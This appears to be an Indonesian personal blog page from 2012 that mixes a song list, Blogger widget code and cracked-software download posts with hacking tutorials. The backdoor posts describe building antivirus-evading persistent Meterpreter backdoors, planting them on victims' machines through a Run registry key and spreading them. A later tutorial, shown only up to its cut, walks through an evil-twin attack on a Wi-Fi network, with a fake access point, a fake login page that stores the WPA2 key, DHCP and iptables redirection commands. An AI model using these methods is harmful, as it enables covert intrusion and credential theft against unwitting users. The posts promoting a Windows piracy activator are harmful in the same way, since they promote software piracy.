Warung Bebas

Wednesday, March 28, 2012

Kumpulan Lagu Galau





Galau, yah itu lagi yang kepikiran. Saya sering ngerasa aneh kalo perasaan ini yang datang. Bikin hidup saya ngga tenang, tidur gelisah, pokoknya banyak lah, ngga bisa disebutin satu per satu *lebay. Sebenarnya, ada yang tau definisi galau yang sebenarnya nggak? Menurut kamus bahasa yang gue baca setiap hari, galau tu merupakan satu kondisi dimana hari sedang tidak tenang dikarenkan suatu hal 


Setiap orang suka musik, karena musik adalah ungkapan atau ekspresi keadaan hati yang dialami seseorang. Berharap bisa menghibur dan menenangkan jiwa


Oleh sebab itu dalam bahasan kali ini, blog tegalau mengumpulkan kumpulan koleksi  lagu galau yang dikumpulkan dan dinilai sendiri.


oke Berikut list lagu yang sering saya dengerin ketika galau


Indonesia

  1. Peterpan - Yang Terdalam
  2. D'bagindas - Maafkan aku
  3. CRAZY CRACKERS- Dear ex
  4. Last Child feat Giselle - Seluruh Nafas Ini *
  5. Five Minutes - Hampa *
  6. Ungu - Sejauh Mungkin
  7. Yovie & Nuno - Menjaga Hati
  8. Yovie & Nuno- Janji Suci *
  9. Yovie & Nuno - Sempat Memiliki
  10. Pasto - Jujur Aku Tak Sanggup *
  11. Pasto - Tanya Hati *
  12. Ungu - Dilema Cinta *
  13. Nyx- Masih Ada *
  14. Five Minutes - Bertahan
  15. Dygta - Kesepian *
  16. Kerispatih - Tertatih *

Lagu Barat
  1. Adele - Some On Like You *
  2. Avril Lavigne - When You're Gone *
  3. Air Supply - Goodbye *
  4. Blink182 - I Miss You
  5. Aerosmith - Don't Want To Miss A Thing 
  6. MLTR - That's Why *
  7. Secondhand Serenade - Fall For You
  8. Simple Plan - Welcome To My Life *
  9. Simple plan - Untitled *
  10. Hoobstank - The reason

Perhatikan lagu yang di Beri tanda (*)  Itu merupakan lagu yang bikin saya sangat galau hehe 

Mungkin ini aja yg bisa saya share saat ini. Sebenernya masih banyak lagi lagu" nya, tapi kayanya segitu dulu aja. Mudah" an yang ngga galau jadi galau, yg galau jadi tambah galau. Hahhahaha..... peace ah  

Saturday, March 24, 2012

CARA MENYEMBUNYIKAN WIDGET 3 IN 1 UNTUK TWITTER,BLOGGER DAN FACEBOOK











Cara Membuat Widget 3 In 1 untuk Twitter,Blogger Dan FacebookDisembunyikan adalah untuk memperhemat ruang dari tampilan blog.disini dengan menampilkan 3 Sekaligus widget namun disisipkan di sisi kanan daripada halaman blog Anda.
Cara Membuat Widget Melayang Google Friend Connect, Twitter dan Facebook Like Box :
1.Masuk Ke Akun blogger








2.Klik Rancangan




3.Klik Tambah Gadget




4.Klik HTML/JavaScript 


5.Masukan kode dibawah ini :
<style type="text/css">
.barrightblogger{ background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9uF0qcPeCgf72hjbFt8FmW5m8quxoTukkMVuPThPn44sGW-UXaJgZf4kuTV7NpJ0cZ5N3SzuNFACCrNRbLERJgzQmYB6DFNgwOw1UUFylTYDYWxCP6kDo9IiS3P1VgiHB27OSzv1LmWWn/');background-repeat:no-repeat;width:39px;height:159px;position:fixed;right:0px;top:50px; z-index:1000;}
.barrightbloggerc{ background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz-AmQWod7OSR7lygaUfDgL_SGWcI8-DbP-keDfIecbK512cZCqGmOTzMWB2IZqcPG8M6KV18fnn-PXyhtfaEepZdiJq3SFXdzqPzHWC_v2UiheHmJMya7PbVWboXa9r6LkdfYd4jE2MbF/');background-repeat:no-repeat;width:288px;height:345px;position:fixed;right:0px;top:50px; z-index:1100;}
.barconteblogger{margin:5px 0 0 47px}
.barrighttwitter{background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivkmeCwWc244W4KpsM6CCAOTzK0JIyZku9gizh2Eklz6osfhAMiuvtbNe7S2fTmEiQjnAY0gNzHm9x6FTGG8YOelXTLku9uHUa6Aph7UYD-ab9tc5Rgz2UD9w1cFjNxxaUj5MJd7U1d2n6/');background-repeat:no-repeat;width:39px;height:159px;position:fixed;right:0px;top:210px;z-index:1000;}
.barrighttwitterc{background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuonIvx4Cq-WfIp04oomVFGtSpsTpamJBU1YtdLbkxpAADrH4jqh6JSP_7rCvrzg-t7SKlqLGF3pIPe3BHtaFoLAT4A_OUNUg_xt1vrIAXvdMFNVzQIxp_Sbqr7_yf4kL6zk6CjQG86BMU/');background-repeat:no-repeat;width:288px;height:345px;position:fixed;right:0px;top:120px; z-index:1100;}
.barcontetwitter{margin:5px 0 0 47px}
.barrightfacebook{background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLtXjpUgT8G4Kzc2tGWlrn8BMELpSdiMFruN0mASb449R9uTy64xuKP75hs3z_IM0RruQhtnJKu8HnMYccZPrWu_jWGjEETaAUuy9CoUwjAEG0rg7HthEn7WX6l0hL_FIL3Vd7jllgfTH/');background-repeat:no-repeat;width:39px;height:159px;position:fixed;right:0px;top:370px; z-index:1000;}
.barrightfacebookc{background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqdlH19jSFzCVLS7aWpFFsJ2TQ3HxlF9S2a7n5lA8QhvDcmkwOZUa_tP9SDJIHPCmhdl-KnQKPoc9KJgjCYnYV4S0kQkaqZ61MupaW-JMOTh7AnwmFBS-IS2O0tPTvlJr78yCOHCbavwIS/');background-repeat:no-repeat;width:288px;height:345px;position:fixed;right:0px;top:185px; z-index:1100;}
.barcontefacebook{margin:5px 0 0 47px}
</style>
<div class="barrightblogger" onmouseover="this.className='barrightbloggerc'" onmouseout="this.className='barrightblogger'">
<div class="barconteblogger">
CONTENT BLOGGER HERE
</div>
</div>
<div class="barrighttwitter" onmouseover="this.className='barrighttwitterc'" onmouseout="this.className='barrighttwitter'">
<div class="barcontetwitter">
CONTENT TWITTER HERE
</div>
</div>
<div class="barrightfacebook" onmouseover="this.className='barrightfacebookc'" onmouseout="this.className='barrightfacebook'">
<div class="barcontefacebook">
CONTENT FACEBOOK HERE
</div>
</div>
6.       Keterangan widget :
  • Ganti tulisan CONTENT BLOGGER HERE dengan kode HTML Google Friend Connect anda.
  • Ganti tulisan CONTENT TWITTER HERE dengan kode HTML widget status Twitter anda.
  • Ganti tulisan CONTENT FACEBOOK HERE dengan kode HTML Facebook Like Box anda.

Cara Memasang gadget Facebook Like Box Pada Blog

untuk memasang like box pada halaman blog, maka terlebih dulu Anda harus membuka Halaman Pengembang Facebook untuk mendapatkan kode plugin like box Anda. Dimana langkah-langkahnya adalah sebagai berikut:
  1. Buka halaman pengembang Facebook, dalam hal ini adalah dengan membuka URL https://developers.facebook.com/docs/reference/plugins/like-box/
  2. Masukkan URL Halaman Facebook atau Fans Page yang Anda kelola kemudian tentukan setelan untuk tampilan like box. Dalam hal ini misalnya: mengatur ukuran lebar dan tinggi, warna, maupun elemen yang akan ditampilkan pada like box. Dan untuk lebih jelasnya perhatikan gambar di bawah ini.
    Ilustrasi Konfigurasi Like Box
  3. Klik tombol ‘Get Code’ untuk mendapatkan kode plugin like box Anda, seperti tampak pada gambar di bawah ini.
    Ilustrasi Dapatkan Kode Plugin
  4. Salin kode plugin untuk like box Anda, kemudian masuk ke ‘Dasbor Blogger’, klik menu ‘Tata Letak’ (Layout), dan selanjutnya klik ‘Tambah Gadget’. Dimana untuk gadget yang ditambahkan adalah ‘HTML/JavaScript’. Untuk lebih jelasnya perhatikan gambar di bawah ini.
    Ilustrasi Tambah Gadget
    Ilustrasi Tambahkan Gadget
  5. Tulis judul gadget, sisipkan kode plugin like box Anda di kotak ‘Konten’, dan kemudian klik tombol ‘Simpan’, seperti yang tampak pada gambar di bawah ini.
    Ilustrasi Konfigurasi Kode Untuk Gadget
Sehingga dengan menggunakan cara di atas maka akan muncul sebuah gadget baru untuk halaman blog Anda, dimana gadget yang dimaksud akan ditampilkan sebagai Facebook Like Box yang akan menghubungkan Facebook Fan Page dengan blog yang Anda kelola.

 

Friday, March 23, 2012

MiniTool Partition Wizard Server Edition 7.1 Full Serial

MiniTool Partition Wizard Server Edition 7.1 Full Serial adalah software yang bisa anda gunakan untuk mempartisi harddisk anda. Mungkin anda ingin membagi beberapa drive pada harddisk anda. Selain membagi,  MiniTool Partition Wizard Server Edition 7.1 Full Serial  ini juga bisa menggabungkan drive yang terpisah menjadi satu. Monggo


















Download:

Windows Loader 2.1.2

Windows Loader 2.1.2 adalah aktivator yang berfungsi menghilangkan pesan validasi Windows bajakan yang ada di Windows kita, jika terdeteksi sebagai Windows palsu. Windows Loader 2.1.2 ini juga akan memasukan Sertifikat Genuine kedalam System Windows kita. Jadi Windows anda sudah terlisensi dengan mudah










Download:

Marine Sharpshooter III RIP

Pernah main game ini? Mungkin ada yang sudah ada juga yang belum. Marine Sharpshooter III RIP adalah game bergenre shooter. Seperti halnya game shoter lainnya, Marine Sharpshooter III RIP ini juga hampir sama, Kita mempunyai kelompok penembak, untuk menyerang dan membunuh kolompok lawan dengan Tembakan, Granat atau Pisau. Seru deh pokoknya, .
















Screenshot: 








System Requirement:
  • Windows 2000/XP/Vista
  • 256 MB of RAM
  • 1.5 GB Disk Space
  • Pentium 4 or AMD equivalent 2 GHz processor or faster
  • DirectX and Windows compatible sound card
  • DirectX 9.0c compatible video card (ATI Radeon 9600 or nVidia GeForce 4 Ti 4600 with 128 MB RAM) or higher
  • 4x CD-ROM or faster
  • Keyboard and Mouse
Download:

Advanced Uninstaller PRO 10.5.7 Full Crack

Tanpa saya jelaskan, mungkin sudah tau apa fungsi software ini.Advanced Uninstaller PRO 10.5.7 Full Crack adalah software yang berfungsi untuk menghapus program (uninstall) pada PC anda. Selain itu, software ini juga mempunyai banyak fitur seperti Quick Cleaner, StartUp Manager, Windows Services, Font Manager, WebTools dan lain-lain.











Download:

Thursday, March 22, 2012

fix audio error on backtrack 5 R2


klik naga > system > preferences > Startup Applications.
trus add > isi name trserah apa aja > commandnya di browse ke ( file system > usr > bin > cari file pulse audio > klik open.
trus restart..
tapi kalo yg audionya kecil, ke terminal>alsamixer> pake tombol kiri-kanan buat milih n atas-bawah buat besarin suaranya

Tuesday, March 20, 2012

Automated Persistent Backdoor on Metasploit Framework

posting sebelumnya kita udah ngebahas tentang backdoor yang undetectable dengan metasploits framework,kali ni kita bakalan membahas cara mengotomatisasi pengiriman backdoor ke korban supaya bekerja seperti RAT (remote administration tool)

pertama, kopas ni kode:
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils zip unzip

Kami akan menggunakan script penghilang  untuk membuat backdoor tidak terdeteksi, dan meluncurkan kerangka metasploit menggunakan script autopersist. Pada gilirannya, autopersist menunggu korban untuk menjalankan backdoor untuk pertama kalinya. Setelah kemudian backdoor dijalankan, maka secara otomatis akan berinteraksi dengan sesi dan meng-upload file yang dibutuhkan (persist.vbs (VBScript), reverse.exe (backdoor)). Kemudian, autopersist menambahkan sebuah entri ke registry 'Run' jendela yang mengeksekusi file pada saat startup. Jangan khawatir, backdoor tersembunyi segera setelah dijalankan dan satu-satunya cara untuk melihatnya adalah melalui taskbar ^_^.

catatan :
baca petunjuk penggunaan n akibat yang ditimbulkannya ok

vanish.sh:Tempatkan script ini di kerangka root folder  (kalo di bt5r1: /pentest/exploits/framework/). Jika Anda ingin mengubah muatan, harus mengedit secara manual. Intip isi script ini sebelum mengeksekusi untuk memastikan apakah sesuai dengan kebutuhanmu, dan jangan lupa untuk chmod + x itu. Script ini dibuat ma astr0baby, vanish3r dan deathc0rps-- makasi buat mereka ^_^

autopersist.rc:Tempatkan script ini kedalam folder script meterpreter (di bt5r1: / pentest / exploits / framework / scripts / meterpreter /). Di sini kamu harus secara manual masukkin LHOST & LPORT, sehingga mengintip ini sebelum dijalankan. asalnya dari ni OMGSecurity.

Tempatkan script ini di / var / www / dikirim ke korban dengan autopersist.rc, dan akan berjalan setiap x kali per detik.Dengan memberi nuansa seemless untuk serangan itu, tetapi kamu juga harus tunggu sebentar sebelum mendapatkan mendapatkan shell. kalo ingin berhenti mendapatkan shell kembali dari korban , cukup dengan menghentikan proses 'wscript.exe'  
~ ni videonya
Ini adalah salinan dari backdoor.exe diciptakan oleh vanish, maka secara otomatis disalin ke / var / www / dengan script.

download skripnya disini [ DOWNLOAD ]

Tips menampilkan recent post website lain

Di postingan sebelumnya saya telah share tips menampilkan recent post ini, nah, sekarang saya memiliki cara lain untuk menampilkan recent post dari website atau blog yang anda kehendaki dan tentunya tidak mengurangi performa loading situs anda.Memang dibandingkan dengan metode recent post lain seperti via google reader, feedburner buzzboost, atau yang lainnya, metode ini masih tergolong lebih

Membuat backdoor undetectable di Metasploit Framework

Hari ini kita akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5! :)

Pertama kita lihat kerajinan muatan sederhana menjadi backdoor, dan ketika loading ke dalam sandbox (Windows XP) anti-virus tidak mengijinkan file yang kita buat untuk didownload.

Well, that’s not any good is it? sapa coba yang mau membukanya kalo dah ada peringatan?

jadi,kita harus buat file ini jadi undetectable, n target kita menggunakan anti-virus Avast. Baru saja saya menemukan script publik di Pastebin (>o<)n setelah melihat ni selama beberapa menit,menurutku nu file paling pas. terutama setelah melihatbaris ke 43… jadi ku ubah deh supaya bisa kupake sendiri —  don’t know who you are or where you’re from but keep it up! :D

Pertama, install ni:
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

jalanin metasploit framework console, gunakan exploit/multi/handler method, n set the payload untuk windows/meterpreter/reverse_https.Ini juga merupakan ide yang baik untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.

Dengan kemampuan backdoor yang tidak terdeteksi, tingkal kreatifnya kita buat  buat nyebarin.

download skripnya disini: [ DOWNLOAD ]
ni videonya

whatweb scanners

WhatWeb adalah tools yang berguna untuk mengidentifikasi website. Tujuannya adalah untuk menjawab pertanyaan, “Apa dan informasi apakah yang terdapat pada Website itu?”. WhatWeb support terhadap teknologi web termasuk sistem manajemen konten (CMS), platform blogging, statistik / analisis paket, JavaScript library , web server, dan embedded device. WhatWeb memiliki lebih dari 900 plugin. WhatWeb juga mengidentifikasi nomor versi, alamat email, ID account, modul web framework, kesalahan SQL, dan banyak lagi.

s
WhatWeb mendukung tingkat agresi untuk mengontrol trade off antara kecepatan dan kehandalan. Ketika Anda mengunjungi situs web pada browser Anda, transaksi mencakup banyak petunjuk tentang apa teknologi web powering bahwa situs web. Kadang-kadang tunggal kunjungi halaman web berisi informasi yang cukup untuk mengidentifikasi sebuah website tetapi ketika tidak, WhatWeb bisa menginterogasi website lebih lanjut. Tingkat default agresi, disebut ‘pasif’, adalah tercepat dan hanya memerlukan satu permintaan HTTP dari sebuah website. Ini cocok untuk pemindaian situs web publik. Mode lebih agresif dikembangkan untuk dalam tes penetrasi.
Plugin WhatWeb Kebanyakan menyeluruh dan mengakui berbagai isyarat dari halus untuk jelas. Sebagai contoh, sebagian besar situs WordPress dapat diidentifikasi oleh meta tag HTML, tetapi minoritas website WordPress menghapus tag ini agar terhindar dari penetrasi gathering information namun hal ini tidak menyurutkan sepak terjang WhatWeb. The WhatWeb WordPress plugin memiliki lebih dari 15 tes, termasuk memeriksa favicon, file default instalasi, halaman login, dan memeriksa “/ wp-content /” dalam link relatif.
Features:
* Over 900 plugins
* Control the trade off between speed/stealth and reliability
* Plugins include example URLs
* Performance tuning. Control how many websites to scan concurrently.
* Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB.
* Recursive web spidering
* Proxy support including TOR
* Custom HTTP headers
* Basic HTTP authentication
* Control over webpage redirection
* Nmap-style IP ranges
* Fuzzy matching
* Result certainty awareness
* Custom plugins defined on the command line
The following types of logging are supported
–log-brief=FILE Brief, one-line, greppable format
–log-verbose=FILE Verbose
–log-xml=FILE XML format. XSL stylesheet is provided
–log-json=FILE JSON format
–log-json-verbose=FILE JSON verbose format
–log-magictree=FILE MagicTree XML format
–log-object=FILE Ruby object inspection format
–log-mongo-database Name of the MongoDB database
–log-mongo-collection Name of the MongoDB collection. Default: whatweb
–log-mongo-host MongoDB hostname or IP address. Default: 0.0.0.0
–log-mongo-username MongoDB username. Default: nil
–log-mongo-password MongoDB password. Default: nil
–log-errors=FILE Log errors. This is usually printed to the screen in red.
Perintah-perintah pada whatweb …
Matches are made with:
* Text strings (case sensitive)
* Regular expressions
* Google Hack Database queries (limited set of keywords)
* MD5 hashes
* URL recognition
* HTML tag patterns
* Custom ruby code for passive and aggressive operations
$ ./whatweb -l
WhatWeb Plugin List
Plugin Name Description
——————————————————————————-
1024-CMS 1024 is one of a few CMS’s leading the way with the i
360-Web-Manager 360-Web-Manager – homepage: http://www.360webmanager.
4images 4images is a powerful web-based image gallery managem
… (truncated – there are a lot)
Untuk melihat plugin detail
$ ./whatweb -I phpBB
WhatWeb Plugin Information
Searching for phpBB
——————————————————————————–
Plugin Name Details
phpBB
Author: Andrew Horton
Version: 0.3
Examples: 16
Matches: 7
Passive function: Yes
Aggressive function: Yes
Version detection: Yes
Description:
phpBB is a free forum phpbb.org
Jika anda inginkan tools tersebut terkolaburasi dengan backtrack anda .. silahkan mengikuti instalasi berikut ini ..
root@IBTeam:# cd /pentest/enumaration
root@IBTeam:/pentest/enumeration# wget http://www.morningstarsecurity.com/downloads/whatweb-0.4.2.tar.gz
root@IBTeam:/pentest/enumeration# tar xvf whatweb*
root@IBTeam:/pentest/enumeration# rm whatweb-0.4.2.tar.gz

root@IBTeam:/pentest/enumeration/whatweb-0.4.2# ./whatweb -v kaskus.us
http://kaskus.us [302] title[302 Found], server-header[lumanau.web.id], redirect-location[http://www.kaskus.us/], md5[9e605d3059406c1333cc6ba597e00151], header-hash[9e605d3059406c1333cc6ba597e00151]
Identifying: http://kaskus.us
HTTP-Status: 302
[["header-hash",
[{:probability=>100,
:name=>"hash",
:string=>"9e605d3059406c1333cc6ba597e00151"}]],
["md5",
[{:probability=>100,
:name=>"page title",
:string=>"9e605d3059406c1333cc6ba597e00151"}]],
["redirect-location",
[{:probability=>100, :name=>"location", :string=>"http://www.kaskus.us/"}]],
["server-header",
[{:probability=>100, :name=>"server string", :string=>"lumanau.web.id"}]],
["title", [{:probability=>100, :name=>"page title", :string=>"302 Found"}]]]
http://www.kaskus.us/ [200] Prototype, vbulletin[3.8.0], uncommon-headers[cluster], title[Kaskus - The Largest Indonesian Community], server-header[lumanau.web.id], meta-generator[vBulletin 3.8.0], md5[69059d0c1bf01a42f72f94128f8dd384], header-hash[cb249759273386faa5da51b9764e333e], footer-hash[77a4f031bdd4a39d1e39560f4c0be5e9], div-span-structure[b0ce091ebaa57bb5844701099a280a1e]
Identifying: http://www.kaskus.us/
HTTP-Status: 200
[["Prototype",
[{:regexp=>/// ]*.js)[^>]*/,
:probability=>100,
:name=>”js tag”}]],
["div-span-structure",
[{:probability=>100,
:name=>"div structure",
:string=>"b0ce091ebaa57bb5844701099a280a1e"}]],
["footer-hash",
[{:probability=>100,
:name=>"hash",
:string=>"77a4f031bdd4a39d1e39560f4c0be5e9"}]],
["header-hash",
[{:probability=>100,
:name=>"hash",
:string=>"cb249759273386faa5da51b9764e333e"}]],
["md5",
[{:probability=>100,
:name=>"page title",
:string=>"69059d0c1bf01a42f72f94128f8dd384"}]],
["meta-generator",
[{:probability=>100,
:name=>"meta generator tag",
:string=>"vBulletin 3.8.0"}]],
["server-header",
[{:probability=>100, :name=>"server string", :string=>"lumanau.web.id"}]],
["title",
[{:probability=>100,
:name=>"page title",
:string=>"Kaskus - The Largest Indonesian Community"}]],
["uncommon-headers",
[{:probability=>100, :name=>"headers", :string=>"cluster"}]],
["vbulletin",
[{:regexp=>/100,
:name=>"meta generator tag"},
{:regexp=>/\* vBulletin [0-9a-z.]+ CSS/,
:probability=>75,
:name=>”CSS comments”},
{:regexp=>
/100,
:name=>”vbulletin_global.js”},
{:probability=>100, :name=>”meta generator tag”, :version=>”3.8.0″},
{:probability=>100, :name=>”css comments”, :version=>”3.8.0″}]]]
// ]]>
Untuk informasi lebih detail silahkan mengunjungi situs resmi dari development
http://www.morningstarsecurity.com/

Seni mengedit file .bashrc di linux dan modifikasi terminal anda

mau tampilan kyk gini ?

zee.console


Sebenarnya hanya membutuhkan sedikit pengetahuan tentang pemograman shell bash. ane coba jelaskan dikit ya… Step pertama untuk membuat huruf – huruf ascii yang bagus anda bisa menggunakan figlet ..sudah ada di repo backtrack atau ubuntu… ya tinggal lakukan perintah “apt-get install figlet” .  Kalau sudah kita tinggal memasukan sedikit modifikasi terhadap file  .bashrc File ini terdapat pada home directory anda , dan menjadi patokan dasar command ketika anda memasukin shell anda sebagai user biasa maupun sebagai root. Dilihat dari tanda titik di depan , maka file ini dalam mode invisible atau ter-hidden. Ok sekarang kita backup dulu ya filenya .
$cp .bashrc .bashrcbackup
Selesai backup kita edit-edit dengan menggunakan text editor kesayangan kita. Anda bisa menggunakan vi, vim , nano , gedit, dll.
$vim .bashrc
nah ane coba bagi-bagi setingan ane :p
Download disini ja
http://pastebin.com/download.php?i=UZXQTkuu
atau langsung mau liat di pastebin
http://pastebin.com/UZXQTkuu
ok perhatikan disitu
pada line 8
# Colors: berisi variable yang akan saya pasangkan dengan warna – warna pemograman bash
pada line 28
# Aliases: berisi tentang shortcut perintah .. akan saya jelaskan sedikit. Pada script bashrc saya tambahkan pada sub aliases
alias forum=' firefox http://forum.indonesianbacktrack.or.id &'
nah nanti kalau saya ngetik forum di konsole maka akan terbuka aplikasi firefox dengan link url langsung ke forum.indonesianbacktrack.or.id… heheh asik kan gk usah susah-susah atau panjang-panjang lagi. Anda dapat menambahkan link shortcut lainnya yang sering anda gunakan ketika memainkan linux anda.
Pada line 53
# function & script : kita dapat menaruh fungsi-fungsi dan script-script tertentu. misalnya saya buat sebuah fungsi dan saya beri nama susanmylove (). hmm fungsi itu saya isikan dengan fungsi if then. jadi itu sebagai akses code lagi .. ketika saya memasuki shell saya akan diminta code pengaman sederhana yang saya buat. Jadi 2 kali masukin password gitu ..hehe.. nah mksud saya disini supaya om bisa memasukan fungsi2 lain yang keren dan atas kreasi om sendiri.
Nah untuk ascii artnya perhatikan line 127
echo -e “${lightgreen}”;figlet “susan-my-love”
kita tinggal menggunakan figlet agar keluar “susan-my-lovenya hehehe .. kemudian apalagi ya.. oh iya klo kita ingin merubah nama root secara default, khususnya bagi pengguna backtrack yang menggunakan akses root sebagai default. ok cari shell prompt yang biasanya menggunakan variable $PS1. Nah pada deklarasi variabel tersebut coba cari kata-kata ini “\u@\h\” ganti \u dengan nama yang anda inginkan .. save terus reboot.. alhasil tampilan kata root pada prompt akan berubah..
gitu dulu deh semoga berguna tutorial saya hari ini .

sumber: zeestuff.wordpress.com/2011/11/26/seni-mengedit-file-bashrc-di-linux-dan-modifikasi-terminal-anda/

hacking wpa/wpa2 tanpa wordlist/bruteforce

Inti dari trik ini adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan “salah konek” atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data. Bagaimana attacker melakukannya ? baik kita mulai

1. Mempersiapkan fakelogin AP
Untuk contoh kali ini saya telah mengupload contoh halaman login akses point palsu di ftp.indonesianbacktrack.or.id , teman-teman bisa mendownloadnya di sana.
A. Membuat database
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,
/etc/init.d/mysql start

B. FakeLogin
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.
root@eichel:/var/www# ls -al
total 84
drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 .
drwxr-xr-x 15 root root 4096 2011-05-10 22:56 ..
-rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html
-rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif
-rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html
-rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin
-rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php
-rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html
-rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css
-rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif
Jika sudah jalankan service apache kita “/etc/init.d/apache2 start” kemudian buka localhost atau dengan ip local kita pada browser.

Okey semua yang kita butuhkan sudah siap , kemudian seperti yang sudah saya singgung di atas, attacker akan membuat sebuah AP palsu yang hampir sama dengan AP Target.
2. FakeAP
A. Information Gathering
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai

Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan “airodump-ng [interface-monitor]” untuk mengambil informasi AP Target.

B. Dhclient Server
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.

Uppz ada keterangan fail disitu .. itu dikarenakan setingan file konfigurasi pada dhcp3-server belum di konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu file konfigurasi default sebelum membuat file konfigurasi yang kita inginkan.
root@eichel:/var/www# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,
root@eichel:/var/www# kwrite /etc/dhcp3/dhcpd.conf
Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Konfigurasi di atas sebenarnya merupakan konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya. Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.
C. Airbase-ng
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama
root@eichel:~# airmon-ng stop mon0
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed)
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@eichel:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode disabled)
Jika sudah sesuai dengan channel AP target ( dalam kasus ini 11 – lihat pada tahap information gathering ) , kita memulai airmon-ng pada channel 11.

Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil “information gathering” dengan airodump untuk mengecoh client.
syntaxnya : airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]

Kemudian perhatikan output pada perintah airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan menciptakan sebuah interface baru yaitu “at0″ dimana nantinya interface at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service dhcp3-server.

3. IPtables
Setelah semuanya berhasil dengan baik, harapan attacker adalah client terkecoh ketika mengakses fakeAP yang telah di buat sebelumnya, maka attacker berharap agar client mengira bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi authentifikasi pada browser. yaitu pada index fakelogin yang telah kita siapkan pada server apache/httpd pada localhost kita. Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi masalah lagi, tapi bagaimana agar client mengakses localhost kita yang menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url yang dimasukan client pada browser ( port 80 ) menuju kepada localhost kita. Misalnya client mengakses google.com maka browser akan mengarahkannya terlebih dahulu ke file pada localhost apache kita.
A. Menghapus semua setingan IPtables.
Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll
root@eichel:~# iptables --flush
root@eichel:~# iptables --table nat --flush
root@eichel:~# iptables --delete-chain
root@eichel:~# iptables --table nat --delete-chain
B.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT
Kemudian lanjutkan dengan mengaktifkan ip_forward
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward
C. Redirect semua permintaan pada port 80
